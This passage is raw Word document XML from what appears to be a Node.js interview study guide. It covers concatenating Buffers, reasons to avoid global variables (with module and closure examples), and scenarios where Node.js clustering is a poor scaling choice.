    <w:p w14:paraId="2E80D55B" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27EC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F85CA58"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Concatenate Buffers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB053FA"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buf1 = Buffer.from('Node.js ');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09929F00"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buf2 = Buffer.from('rocks!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EA7C2B" w14:textId="77777777" w:rsidR="00DF27EC" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27E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combinedBuf = Buffer.concat([buf1, buf2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D41C32D" w14:textId="2C86EFD2" w:rsidR="00DF0F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF27E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console.log(combinedBuf.toString()); // Output: Node.js rocks!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB1F495" w14:textId="7800D377" w:rsidR="00DF0F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc178383276"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Why is it important to avoid using global variables</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="7055CA43"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t>Avoiding the use of global variables is a best practice in programming, particularly in JavaScript and Node.js. Here’s why it’s important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D5611"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rPr>
        <w:t>1. Namespace Pollution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B9495"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lastRenderedPageBreak/>
        <w:t>Global variables are accessible from anywhere in your codebase, which can lead to name collisions and unexpected behavior. Multiple parts of your application might unintentionally modify or overwrite global variables, leading to bugs that are difficult to track down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1FD9C4"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rPr>
        <w:t>2. Maintainability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F21289"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t>Global variables can make code harder to understand and maintain. When variables are global, it’s not always clear where they are modified or accessed, making it more challenging to follow the flow of data and logic through the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BE05E9"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rPr>
        <w:t>3. Debugging Complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF5841A"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t>Debugging issues related to global variables can be complex because the variables can be modified from any part of your application. This can lead to unpredictable behavior, making it harder to isolate and fix bugs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D9A5BA"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rPr>
        <w:t>4. Concurrency Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B78099"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t>In a multi-threaded or asynchronous environment, global variables can introduce race conditions. Since multiple threads or asynchronous operations might modify the same global variable simultaneously, it can lead to inconsistent or erroneous states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD57FB"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rPr>
        <w:t>5. Testing Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB50F54"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t>Global variables can make unit testing more difficult. Tests might inadvertently affect each other if they share or rely on global state, making it harder to write isolated and repeatable tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0019C683"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rPr>
        <w:t>6. Encapsulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E13D85"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t>Encapsulation is a fundamental principle of software design, which involves keeping data and methods that operate on that data together in a single unit. Using global variables breaks this encapsulation, as data and functions can be accessed and modified from outside their intended scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1701FE6C"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rPr>
        <w:t>7. Security Risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A3419"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t>Global variables can introduce security vulnerabilities if they contain sensitive information or are accessed and manipulated by parts of the code that should not have access to them. Proper encapsulation helps mitigate these risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFD8C22"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rPr>
        <w:t>Example Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF5C126"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t>Consider a scenario where you have a global variable userData that stores user information. If multiple modules or functions modify userData, it becomes challenging to track and manage these modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B950747"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Global variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F44F9A6"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userData = { name: 'Alice', age: 30 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042A1A64" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4333EF"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Module 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532C4E36"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updateUserName(newName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C14728"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userData.name = newName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D3A5B1"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C88612D" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2704C813"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Module 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7C5ABD"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printUserName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1FCB2"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console.log(userData.name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15381235"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31F310E" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA9A998"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updateUserName('Bob');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDC1F4F"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printUserName(); // Output: Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9F38B" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, changes to userData in one part of the code can affect other parts of the code, making it harder to manage and understand the codebase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F0C6CE"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rPr>
        <w:t>Alternatives to Global Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A07A63A" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Local Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use local variables within functions or blocks to limit their scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B57C3C4"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exampleFunction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDF0B8"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let localVar = 'I am local';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0908BDBB"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console.log(localVar);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F635E37"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2222F10" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use modules to encapsulate data and functionality. This allows you to control the scope and access to variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3380C8C2"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userModule.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA28973"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userData = { name: 'Alice', age: 30 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7FEBD9" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0287D368"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getUserName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC5DBBA"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userData.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548B4916"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E7FABA7" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E91DA2"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setUserName(newName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44227BFC"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userData.name = newName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB4BDC"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89A3B8C" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FEB30D2"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module.exports = { getUserName, setUserName };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C85A2" w14:textId="77777777" w:rsidR="006E4FE2" w:rsidRPr="00DA2F32" w:rsidRDefault="006E4FE2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="641372FF" w14:textId="622AB9F3"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app.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592F97D9"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userModule = require('./userModule');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1394D" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085FEDCE"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userModule.setUserName('Bob');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6332BF77"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console.log(userModule.getUserName()); // Output: Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE82AF2" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Closures</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use closures to create private variables that are not accessible from outside their scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A1A946"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createUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE79BE6"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let userName = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C54AC9C" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776E9F48"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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E1795A"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getUserName: () =&gt; userName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F956A1"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setUserName: (newName) =&gt; { userName = newName; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7D054D"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0413843"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1181B49" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74DB9B28"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user = createUser();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC3B61"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console.log(user.getUserName()); // Output: Alice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DEB6CE" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC" w:rsidP="009E0607">
      <w:pPr>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user.setUserName('Bob');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6917CA03" w14:textId="77777777" w:rsidR="00B667CC" w:rsidRPr="00DA2F32" w:rsidRDefault="00B667CC"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console.log(user.getUserName()); // Output: Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4705C68E" w14:textId="77777777" w:rsidR="00DF0F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF0F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32037C96" w14:textId="77777777" w:rsidR="00BB2F17" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc178383277"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clustering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FA33F8" w14:textId="0F2CD2A2" w:rsidR="0001503C" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc178383278"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is Node.js clustering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="47BA2549" w14:textId="1AA8AFF3" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc178383279"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Can you describe a scenario where Node.js clustering might not be the best solution for scaling an application?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="0155D242" w14:textId="77777777" w:rsidR="00726583"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Node.js clustering can be a powerful tool for scaling applications by leveraging multiple CPU cores, but there are scenarios where it might not be the best solution. Here are some situations where clustering may not be the most effective approach for scaling your application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546FCF2B" w14:textId="77777777" w:rsidR="00726583" w:rsidRPr="00DA2F32" w:rsidRDefault="00726583" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Single-Threaded Workloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B905E" w14:textId="77777777" w:rsidR="00726583"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For applications that are inherently single-threaded or that primarily perform CPU-bound tasks, such as intensive computations, clustering may not provide significant benefits. In such cases, optimizing the algorithm or distributing the workload across multiple processes or services might be more effective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E5319" w14:textId="77777777" w:rsidR="00726583" w:rsidRPr="00DA2F32" w:rsidRDefault="00726583" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Stateful Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04169D9C" w14:textId="77777777" w:rsidR="00726583"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If your application maintains a lot of in-memory state that needs to be shared across multiple instances, clustering can be challenging. Node.js processes in a cluster do not share memory space, so state synchronization between processes would require additional mechanisms, such as distributed caches or databases, which can add complexity and overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A90DA2" w14:textId="77777777" w:rsidR="00726583" w:rsidRPr="00DA2F32" w:rsidRDefault="00726583" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. High Inter-Process Communication Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7D073F" w14:textId="77777777" w:rsidR="00726583"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In a clustered environment, inter-process communication (IPC) can become a bottleneck. If your application requires frequent and intensive communication between worker processes, the IPC overhead might outweigh the benefits of clustering. In such cases, optimizing the design to reduce IPC or exploring other scaling strategies might be more appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098BDE6C" w14:textId="77777777" w:rsidR="00726583" w:rsidRPr="00DA2F32" w:rsidRDefault="00726583" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Real-Time Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E0833D" w14:textId="77777777" w:rsidR="00726583"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For real-time applications, such as chat or live streaming services, the inherent latency introduced by IPC and network communication can impact performance. If the application has stringent real-time requirements, clustering might introduce additional complexity and latency. In such scenarios, horizontal scaling with load balancing or dedicated real-time frameworks might be more suitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117A93B" w14:textId="77777777" w:rsidR="00726583" w:rsidRPr="00DA2F32" w:rsidRDefault="00726583" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C40FC2" w14:textId="77777777" w:rsidR="00726583"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In a microservices architecture, where each service is responsible for a specific piece of functionality, clustering a single service may not address scaling challenges effectively. Instead, you might need to scale individual services independently, potentially using container orchestration platforms like Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D385B" w14:textId="77777777" w:rsidR="00726583" w:rsidRPr="00DA2F32" w:rsidRDefault="00726583" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Limited Performance Improvement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3187BB59" w14:textId="77777777" w:rsidR="00726583"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In some cases, clustering might not provide a significant performance improvement if the application's bottleneck is not related to CPU usage. For example, if the bottleneck is due to I/O operations, network latency, or database performance, clustering may not address these issues directly.</w:t>
      </w:r>
    </w:p>
